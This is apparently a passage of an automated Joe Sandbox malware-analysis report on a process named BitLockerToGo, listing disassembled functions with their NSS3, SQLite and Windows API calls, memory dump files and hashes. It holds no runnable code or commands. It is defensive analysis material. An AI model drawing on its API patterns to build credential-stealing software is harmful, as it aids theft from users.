                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F971D571E002058FDB14CFA5CC94AAAB7F4BF44318F14892EE90D97711EB71D954CBA9
                                                                                                                                                                                                                                                                                                                                                          Function 6C691CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C691F19
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C692166
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C69228F
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C6923B8
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C69241C
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpy$Error
                                                                                                                                                                                                                                                                                                                                                          • String ID: manufacturer$model$serial$token
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3204416626-1906384322
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3230bd5ae6f2475023d4f639cda0f62ae4ea85a0fd442f7d32e9ebb522b12b79
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e12e2433a315054c501811a7b83d123fc2d91456ee0f6e42c949e4d123c93628
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3230bd5ae6f2475023d4f639cda0f62ae4ea85a0fd442f7d32e9ebb522b12b79
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C70210A2E0CBCD6EF7318671C48C3D77BE49B45328F1C166EC6DE46683C3A859898356
                                                                                                                                                                                                                                                                                                                                                          Function 6C5D0FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C62F9C9,?,6C62F4DA,6C62F9C9,?,?,6C5F369A), ref: 6C5CCA7A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C5CCB26
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C5D103E
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C5D1139
                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C5D1190
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C5D1227
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C5D126E
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C5D127F
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: Pul$delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2733752649-1063654802
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6ca9c0a9795ebf903b7a824182115097a32ea5185d3499e5b694e7bd93d0d841
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2b5f53b2a8ebaaa94764f5514368ce10ebe3549300149d247abd5c9dd069acb6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ca9c0a9795ebf903b7a824182115097a32ea5185d3499e5b694e7bd93d0d841
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D71D532705305DBEB049FA9ED89A6F3376FB86334F150639E91287A80DB31E941C796
                                                                                                                                                                                                                                                                                                                                                          Function 6C696C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C641C6F,00000000,00000004,?,?), ref: 6C696C3F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C641C6F,00000000,00000004,?,?), ref: 6C696C60
                                                                                                                                                                                                                                                                                                                                                          • PR_ExplodeTime.NSS3(00000000,6C641C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C641C6F,00000000,00000004,?,?), ref: 6C696C94
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3534712800-180463219
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c74b622492269008192928048b898fd6a3f8e773805ff2ab6080145ee909f87e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: df068fdfb0824519813807d6cefb481da19cb42408f56cf0ebb0c6be807df8ed
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c74b622492269008192928048b898fd6a3f8e773805ff2ab6080145ee909f87e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A513B72B016494FC708CDADDC526DEBBDAABA4310F48C23AE842DB781D678E906C751
                                                                                                                                                                                                                                                                                                                                                          Function 6C710F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C711027
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7110B2
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C711353
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpy$strlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2619041689-2155869073
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f651d998669c6fc4f89cb8bd9520dc824735bc1c6d75858c0061e2e7f3616db5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d8b97c4f71e4b435df266a35befc2c7b609102f3fabdf549c02e743239264fdf
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f651d998669c6fc4f89cb8bd9520dc824735bc1c6d75858c0061e2e7f3616db5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30E1BF71A0C3809FD704CF18C980A6BBBF1BF96358F18892DE9958BB51E771E945CB42
                                                                                                                                                                                                                                                                                                                                                          Function 6C718FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C718FEE
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7190DC
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C719118
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C71915C
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7191C2
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C719209
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                                                          • String ID: 3333$UUUU
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1967222509-2679824526
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b9a212b42e8b9555df1f4bafbdcdef31a2d13868348205a0beaf5b3aec851d09
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1791f80c434d36dcdd8abfed9f9e24d02974e35e96e10df1f87d5196532e5031
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9a212b42e8b9555df1f4bafbdcdef31a2d13868348205a0beaf5b3aec851d09
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14A19E72E001159FDB04CB69CD84B9EB7B5BB88324F0D4179E909A7741E736EC52CBA0
                                                                                                                                                                                                                                                                                                                                                          Function 6C6ABD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C6ABD48
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C6ABD68
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C6ABD83
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C6ABD9E
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C6ABDB9
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C6ABDD0
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C6ABDEA
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C6ABE04
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C6ABE1E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: AlgorithmPolicy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2721248240-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a175c4b58da1f134bffc26c90cb93a1b48cbf1230c1501e11e17bd3ca213bccd
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b6b67aa912bece7ec7f3da219675199073d542a42357e8654c273832334def6d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a175c4b58da1f134bffc26c90cb93a1b48cbf1230c1501e11e17bd3ca213bccd
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D21A5B6E0429D57FB0056D69C43F8B72B4ABD278DF081124F917EE641F7109C1A86EE
                                                                                                                                                                                                                                                                                                                                                          Function 6C758D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A14E4,6C70CC70), ref: 6C758D47
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C758D98
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630F00: PR_GetPageSize.NSS3(6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F1B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630F00: PR_NewLogModule.NSS3(clock,6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F25
                                                                                                                                                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C758E7B
                                                                                                                                                                                                                                                                                                                                                          • htons.WSOCK32(?), ref: 6C758EDB
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C758F99
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C75910A
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                                                                                                                                                                                                          • String ID: %u.%u.%u.%u
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1845059423-1542503432
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8977b50aa568d1fa0ad10fd39b28afafc996185fb5de0168ca252f7ddeba26d5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1764383a84e021ea97059b910fa9b5f51331b41bb6248383943734eddc63ed3c
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8977b50aa568d1fa0ad10fd39b28afafc996185fb5de0168ca252f7ddeba26d5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2902F071A062618FDB04CF19C56836ABBB3EF52344F99C26EC8915FB92CB31D916C790
                                                                                                                                                                                                                                                                                                                                                          Function 6C6D68E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_GetIdentitiesLayer.NSS3 ref: 6C6D68FC
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C6D6924
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: EnterCriticalSection.KERNEL32 ref: 6C7090E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C709116
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: LeaveCriticalSection.KERNEL32 ref: 6C70913F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C6D693E
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6D6977
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6D69B8
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C6D6B1E
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C6D6B39
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6D6B62
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4003455268-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c45e928cbf5181d022e4387f4e6a14b757206ece0a73ed7348edcc14f48fb2eb
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 307017a75cf517b31afd1ceabd953a32adf4fadb2e99460d438ab1b01d9bb016
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c45e928cbf5181d022e4387f4e6a14b757206ece0a73ed7348edcc14f48fb2eb
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11918374658600CBDB50CF2EC58059E7BB2FB87308B628A69D844CFB29D771F951CB89
                                                                                                                                                                                                                                                                                                                                                          Function 6C6609A0 Relevance: 11.0, APIs: 7, Instructions: 489memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6606A0: TlsGetValue.KERNEL32 ref: 6C6606C2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6606A0: EnterCriticalSection.KERNEL32(?), ref: 6C6606D6
